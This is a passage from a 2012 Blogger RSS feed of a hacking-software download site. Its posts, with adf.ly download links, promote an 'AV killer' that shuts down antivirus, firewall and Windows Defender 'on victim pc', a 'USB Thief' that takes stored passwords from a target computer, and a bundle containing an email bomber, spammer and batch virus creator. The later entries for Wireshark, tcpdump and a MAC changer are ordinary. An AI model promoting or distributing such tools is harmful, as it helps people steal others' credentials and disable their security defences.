domain="http://www.blogger.com/atom/ns#">Softwares</category><title>KILL TASKS ON VICTIM COMPUTER : AV KILLER</title><description>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhd9wie0nWjVyUttTduixTP9tW-s7m6RCwBTT6hG_2Ik3LqVbivi2-ODRIbPs7zwN_HQ-nBc3FFGj6fZUqgsaOY9Egn9473avibEn0Sts4nWy9d4RXOClBR072528jQwlmZMCRlux6HA2A/s320/SoUi.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhd9wie0nWjVyUttTduixTP9tW-s7m6RCwBTT6hG_2Ik3LqVbivi2-ODRIbPs7zwN_HQ-nBc3FFGj6fZUqgsaOY9Egn9473avibEn0Sts4nWy9d4RXOClBR072528jQwlmZMCRlux6HA2A/s320/SoUi.png&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
avkiller is software used to bypas firewall, antivirus and many security related programs and softwres services on victim pc. Once the program is executed, avkiller software will run in background and start killing all security&amp;nbsp; tasks on victim pc. These tasks include firewall, antivirus, windows defender and various other services.&lt;br /&gt;
&lt;br /&gt;
&lt;a href=&quot;http://adf.ly/DSMqD&quot; target=&quot;_blank&quot;&gt;Download&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
Or&lt;br /&gt;
&lt;br /&gt;
&lt;a href=&quot;http://adf.ly/DSMoV&quot; target=&quot;_blank&quot;&gt;Here&lt;/a&gt;&lt;/div&gt;
</description><link>http://hackingcrackingsoftwares.blogspot.com/2012/10/kill-tasks-on-victim-computer-av-killer.html</link><author>noreply@blogger.com (Anonymous)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhd9wie0nWjVyUttTduixTP9tW-s7m6RCwBTT6hG_2Ik3LqVbivi2-ODRIbPs7zwN_HQ-nBc3FFGj6fZUqgsaOY9Egn9473avibEn0Sts4nWy9d4RXOClBR072528jQwlmZMCRlux6HA2A/s72-c/SoUi.png" height="72" width="72"/><thr:total>3</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-615852925198318135.post-121358016496913424</guid><pubDate>Fri, 05 Oct 2012 22:03:00 +0000</pubDate><atom:updated>2012-10-11T12:31:47.526-07:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Others</category><category domain="http://www.blogger.com/atom/ns#">Softwares</category><title>FAKE ERROR MESSAGE GENERATOR : MESSAGE MANAGER</title><description>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgT8QPsT0yw-BYTRH2ckQE-z9DtGcR2QFEQLnJJv5Z8XdhOONgzneCrgIGzao7yM05M4iJ64cAr0EHukyayOnyYimOXE9QTsAmh4ZTpVbZEdGzWX44aPP2JEJ-bvWbPgDtRsvEZb_ccdzA/s320/fake-window-message-1110.gif&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgT8QPsT0yw-BYTRH2ckQE-z9DtGcR2QFEQLnJJv5Z8XdhOONgzneCrgIGzao7yM05M4iJ64cAr0EHukyayOnyYimOXE9QTsAmh4ZTpVbZEdGzWX44aPP2JEJ-bvWbPgDtRsvEZb_ccdzA/s320/fake-window-message-1110.gif&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Message Manager is a software which show fake error message when it is told to do. You just have to input the txt to be displayed in the error messages and it will display unlimited no. of fake and duplicate error messages.&lt;br /&gt;&lt;br /&gt;&lt;a href=&quot;http://adf.ly/DSM6o&quot; target=&quot;_blank&quot;&gt;Download&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;or&lt;br /&gt;&lt;br /&gt;&lt;a href=&quot;http://adf.ly/DSM5X&quot; target=&quot;_blank&quot;&gt;Here&lt;/a&gt;&lt;/div&gt;</description><link>http://hackingcrackingsoftwares.blogspot.com/2012/10/fake-error-message-generator-message.html</link><author>noreply@blogger.com (Anonymous)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgT8QPsT0yw-BYTRH2ckQE-z9DtGcR2QFEQLnJJv5Z8XdhOONgzneCrgIGzao7yM05M4iJ64cAr0EHukyayOnyYimOXE9QTsAmh4ZTpVbZEdGzWX44aPP2JEJ-bvWbPgDtRsvEZb_ccdzA/s72-c/fake-window-message-1110.gif" height="72" width="72"/><thr:total>2</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-615852925198318135.post-6044532709194136786</guid><pubDate>Fri, 05 Oct 2012 21:52:00 +0000</pubDate><atom:updated>2012-10-11T12:31:47.603-07:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Others</category><category domain="http://www.blogger.com/atom/ns#">Softwares</category><title>HACK PASSWORDS : USB THIEF</title><description>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgMezsbJ4aqI0F4WQXRVffNquUB28edxZ09T4f7pAQkaKeFmMFh702yybgd7c3Bi59UR5xHzMnpvm-zCThn87sQgYeVPb79KqJKN_8O9P8MqeaNRrBrBSPESD5Foev5MgTUXzDvE8-OZiU/s320/belkin-usb-laptop-security-alarm.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgMezsbJ4aqI0F4WQXRVffNquUB28edxZ09T4f7pAQkaKeFmMFh702yybgd7c3Bi59UR5xHzMnpvm-zCThn87sQgYeVPb79KqJKN_8O9P8MqeaNRrBrBSPESD5Foev5MgTUXzDvE8-OZiU/s320/belkin-usb-laptop-security-alarm.jpg&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;usb thief is a collection of small softwares n programs which can stole password locally stored on a pc. Just unpack the .rar file into the root drive of your USB and plug the USB onto that pc on which you want to hack password.&lt;br /&gt;&lt;br /&gt;&lt;a href=&quot;http://adf.ly/DSLJ9&quot; target=&quot;_blank&quot;&gt;Download&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Or&lt;br /&gt;&lt;a href=&quot;http://adf.ly/DSLG2&quot; target=&quot;_blank&quot;&gt;Here&lt;/a&gt;&lt;/div&gt;</description><link>http://hackingcrackingsoftwares.blogspot.com/2012/10/hack-passwords-usb-thief.html</link><author>noreply@blogger.com (Anonymous)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgMezsbJ4aqI0F4WQXRVffNquUB28edxZ09T4f7pAQkaKeFmMFh702yybgd7c3Bi59UR5xHzMnpvm-zCThn87sQgYeVPb79KqJKN_8O9P8MqeaNRrBrBSPESD5Foev5MgTUXzDvE8-OZiU/s72-c/belkin-usb-laptop-security-alarm.jpg" height="72" width="72"/><thr:total>1</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-615852925198318135.post-8007764541155266961</guid><pubDate>Fri, 05 Oct 2012 21:39:00 +0000</pubDate><atom:updated>2012-10-11T12:31:47.622-07:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Others</category><category domain="http://www.blogger.com/atom/ns#">Softwares</category><title>SWISS ARMY KNIFE</title><description>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhZVsT_cHjFe7Duyhq3qeehq5Ub85nmscS6w5GRY3p-6SA5A-97DxLrqHr9cEOMd2Iuf1VpDYd5kfJ-Y0bQxPT9Bkk3fhZNiKbIPzOoijXS2WNfye8syDCtDPOkEJP3XMNca6Y9PPtN0KE/s320/SwissArmyKnifeV3.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhZVsT_cHjFe7Duyhq3qeehq5Ub85nmscS6w5GRY3p-6SA5A-97DxLrqHr9cEOMd2Iuf1VpDYd5kfJ-Y0bQxPT9Bkk3fhZNiKbIPzOoijXS2WNfye8syDCtDPOkEJP3XMNca6Y9PPtN0KE/s320/SwissArmyKnifeV3.jpg&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;Swiss Army Knife is software and program which hav ability to perform&amp;nbsp; tasks of our pc like logoff, shutdown opening Task Manager internet explorer and firefox. It also has builtin hacking tools like Port Scanner Email Bomber Facebook Freezer IM Spammer and also a Batch Virus creator.&lt;br /&gt;&lt;br /&gt;&lt;a href=&quot;http://adf.ly/DSKEn&quot; target=&quot;_blank&quot;&gt;Download&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Or&lt;br /&gt;&lt;br /&gt;&lt;a href=&quot;http://adf.ly/DSKGS&quot; target=&quot;_blank&quot;&gt;Here&lt;/a&gt;&lt;/div&gt;</description><link>http://hackingcrackingsoftwares.blogspot.com/2012/10/swiss-army-knife.html</link><author>noreply@blogger.com (Anonymous)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhZVsT_cHjFe7Duyhq3qeehq5Ub85nmscS6w5GRY3p-6SA5A-97DxLrqHr9cEOMd2Iuf1VpDYd5kfJ-Y0bQxPT9Bkk3fhZNiKbIPzOoijXS2WNfye8syDCtDPOkEJP3XMNca6Y9PPtN0KE/s72-c/SwissArmyKnifeV3.jpg" height="72" width="72"/><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-615852925198318135.post-8481609694173821371</guid><pubDate>Fri, 05 Oct 2012 21:36:00 +0000</pubDate><atom:updated>2012-10-11T13:32:27.882-07:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Others</category><category domain="http://www.blogger.com/atom/ns#">Softwares</category><title>SMAC : THE MAC ADDRESS CHANGER</title><description>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjs0J_aqoD9zm8mt9upLiYN8YAVG53RZ7QV0kOeRbd5fMP9nITTHlw8W6_P0868wevLmSRIrXWegxqeldirKFPKXTD2jyAlzqLb5aGwLbL3p1soXI0SAjBECuvQ-mb_QCZOnzKtdhAZcI4/s320/MAC+Address+Changer.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjs0J_aqoD9zm8mt9upLiYN8YAVG53RZ7QV0kOeRbd5fMP9nITTHlw8W6_P0868wevLmSRIrXWegxqeldirKFPKXTD2jyAlzqLb5aGwLbL3p1soXI0SAjBECuvQ-mb_QCZOnzKtdhAZcI4/s320/MAC+Address+Changer.jpg&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
SMAC is easy to use MAC Address Changer for Windows systems network card manufacturers allow this option or not.&lt;br /&gt;
&lt;br /&gt;
&lt;ul style=&quot;text-align: left;&quot;&gt;
&lt;li&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; Automatically Activate MAC Address after changing&lt;/li&gt;
&lt;/ul&gt;
&lt;ul style=&quot;text-align: left;&quot;&gt;
&lt;li&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; display the manufacturer of the MAC Address &lt;/li&gt;
&lt;/ul&gt;
&lt;ul style=&quot;text-align: left;&quot;&gt;
&lt;li&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; Generate any New MAC Address based on a selected manufacturer&lt;/li&gt;
&lt;/ul&gt;
&lt;ul style=&quot;text-align: left;&quot;&gt;
&lt;li&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; Preload MAC Addresses List n choose the new MAC address from the list.&lt;/li&gt;
&lt;/ul&gt;
&lt;ul style=&quot;text-align: left;&quot;&gt;
&lt;li&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; IPConfig button click to display network adapter&amp;nbsp; info to confirm changes&lt;/li&gt;
&lt;/ul&gt;
&lt;ul style=&quot;text-align: left;&quot;&gt;
&lt;li&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; Userfriendly GUI&lt;/li&gt;
&lt;/ul&gt;
&lt;a href=&quot;http://adf.ly/DSK5K&quot; target=&quot;_blank&quot;&gt;Download &lt;/a&gt;&lt;/div&gt;
</description><link>http://hackingcrackingsoftwares.blogspot.com/2012/10/smac-mac-address-changer.html</link><author>noreply@blogger.com (Anonymous)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjs0J_aqoD9zm8mt9upLiYN8YAVG53RZ7QV0kOeRbd5fMP9nITTHlw8W6_P0868wevLmSRIrXWegxqeldirKFPKXTD2jyAlzqLb5aGwLbL3p1soXI0SAjBECuvQ-mb_QCZOnzKtdhAZcI4/s72-c/MAC+Address+Changer.jpg" height="72" width="72"/><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-615852925198318135.post-8319708597550601808</guid><pubDate>Fri, 05 Oct 2012 21:21:00 +0000</pubDate><atom:updated>2012-10-11T13:32:33.498-07:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Others</category><category domain="http://www.blogger.com/atom/ns#">Softwares</category><title>INVISIBLE SECRETS</title><description>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgwuLl6paBf0X5P5k4gXG4VOhn1kzQjGgH8iY1cDwUSx0oUQ6RgTMiZGmysx59W_iVe7Cf5Z_m2bJhLlIokTLxCQpB9PuLJzNXf0xRpDB78cbOdvTn4G_rwn30xY3s3-G65YIARSq-pips/s320/invsecr2.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgwuLl6paBf0X5P5k4gXG4VOhn1kzQjGgH8iY1cDwUSx0oUQ6RgTMiZGmysx59W_iVe7Cf5Z_m2bJhLlIokTLxCQpB9PuLJzNXf0xRpDB78cbOdvTn4G_rwn30xY3s3-G65YIARSq-pips/s320/invsecr2.jpg&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
By this program, you will be able to encrypt any file say a program, song, document etc in a carrier file (JPEG or BMP image) and send it to anyone without exposing it to world and your friend or other person can decrypt it on other end using this software. You can also specify the password for encryption and decryption. The person on other end can decrypt the file if he has this software and knows the encryption password &lt;br /&gt;
&lt;br /&gt;
&lt;ul&gt;
&lt;li&gt;Delete carrier file after process&lt;/li&gt;
&lt;li&gt;Add fake files to play pranks on friends&amp;nbsp;&lt;/li&gt;
&lt;li&gt;Add other carrier formats (.doc, .txt etc.) other than JPEG or BMP images &lt;/li&gt;
&lt;/ul&gt;
&lt;a href=&quot;http://adf.ly/DSIw3&quot; target=&quot;_blank&quot;&gt;Download&lt;/a&gt; &lt;br /&gt;
&lt;br /&gt;
Or&lt;br /&gt;
&lt;br /&gt;
&amp;nbsp;&lt;a href=&quot;http://adf.ly/DSIs5&quot; target=&quot;_blank&quot;&gt;Here&lt;/a&gt; &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;&lt;/div&gt;
</description><link>http://hackingcrackingsoftwares.blogspot.com/2012/10/invisible-secrets.html</link><author>noreply@blogger.com (Anonymous)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgwuLl6paBf0X5P5k4gXG4VOhn1kzQjGgH8iY1cDwUSx0oUQ6RgTMiZGmysx59W_iVe7Cf5Z_m2bJhLlIokTLxCQpB9PuLJzNXf0xRpDB78cbOdvTn4G_rwn30xY3s3-G65YIARSq-pips/s72-c/invsecr2.jpg" height="72" width="72"/><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-615852925198318135.post-5963006887435336618</guid><pubDate>Tue, 02 Oct 2012 08:53:00 +0000</pubDate><atom:updated>2012-10-11T13:32:46.832-07:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Sniffers</category><category domain="http://www.blogger.com/atom/ns#">Softwares</category><title>WIRESHARK: SNIFFER</title><description>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhyV3yOh21NY58ll_8yW8qY1kfxPYfm8W0xIemZaVowRqZzSNoCWhQFPuKdr9B4T5Ur67co-HjuLkbk5Nazzga7vwJ0ZMY2ZOkQJLz0sGQQulg5TsL3SuovlprOLCmhvzCFq7jDghrFOGA/s320/Wireshark_Icon.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhyV3yOh21NY58ll_8yW8qY1kfxPYfm8W0xIemZaVowRqZzSNoCWhQFPuKdr9B4T5Ur67co-HjuLkbk5Nazzga7vwJ0ZMY2ZOkQJLz0sGQQulg5TsL3SuovlprOLCmhvzCFq7jDghrFOGA/s320/Wireshark_Icon.png&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
Wireshark is a open source network protocol analyzer for Unix and Windows. It allows you to examine data from a live network or from a capture file on disk. You can browse the capture data delving down into just the level of packet detail you need. Wireshark has many powerful features, including a rich display filter language and the ability to view the reconstructed stream of a TCP session. It also supports hundreds of protocols and media types.&lt;br /&gt;
&lt;br /&gt;
&lt;a href=&quot;http://adf.ly/DMKX2&quot; target=&quot;_blank&quot;&gt;Download&lt;/a&gt;&lt;/div&gt;
</description><link>http://hackingcrackingsoftwares.blogspot.com/2012/10/wireshark-sniffer.html</link><author>noreply@blogger.com (Anonymous)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhyV3yOh21NY58ll_8yW8qY1kfxPYfm8W0xIemZaVowRqZzSNoCWhQFPuKdr9B4T5Ur67co-HjuLkbk5Nazzga7vwJ0ZMY2ZOkQJLz0sGQQulg5TsL3SuovlprOLCmhvzCFq7jDghrFOGA/s72-c/Wireshark_Icon.png" height="72" width="72"/><thr:total>1</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-615852925198318135.post-8529407208284220038</guid><pubDate>Tue, 02 Oct 2012 08:48:00 +0000</pubDate><atom:updated>2012-10-11T13:32:52.779-07:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Sniffers</category><category domain="http://www.blogger.com/atom/ns#">Softwares</category><title>TCP DUMP: SNIFFER</title><description>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgnzaLHdTzJ6CqTqc1ddFAhCjIuJiyxaFBoyr-gEO2eSXdWh0f7FMUXMHo57AXPgg1xiqEzZZAt7Gl_0KmrhiEjRPHNd8ZGSuWLyqiFz5djPoX3hbkVIbrjhN5zJAgj1jElU4p7ywp45gk/s320/nmap.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgnzaLHdTzJ6CqTqc1ddFAhCjIuJiyxaFBoyr-gEO2eSXdWh0f7FMUXMHo57AXPgg1xiqEzZZAt7Gl_0KmrhiEjRPHNd8ZGSuWLyqiFz5djPoX3hbkVIbrjhN5zJAgj1jElU4p7ywp45gk/s320/nmap.png&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
Tcpdump is the classic IP sniffer which requires fewer system resources. It is great for tracking down network problems or monitoring activity.&lt;br /&gt;
&lt;br /&gt;
&lt;a href=&quot;http://adf.ly/DMK9u&quot; target=&quot;_blank&quot;&gt;Download&lt;/a&gt;&lt;/div&gt;
</description><link>http://hackingcrackingsoftwares.blogspot.com/2012/10/tcp-dump-sniffer.html</link><author>noreply@blogger.com (Anonymous)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgnzaLHdTzJ6CqTqc1ddFAhCjIuJiyxaFBoyr-gEO2eSXdWh0f7FMUXMHo57AXPgg1xiqEzZZAt7Gl_0KmrhiEjRPHNd8ZGSuWLyqiFz5djPoX3hbkVIbrjhN5zJAgj1jElU4p7ywp45gk/s72-c/nmap.png" height="72" width="72"/><thr:total>0</thr:total></item></channel></rss>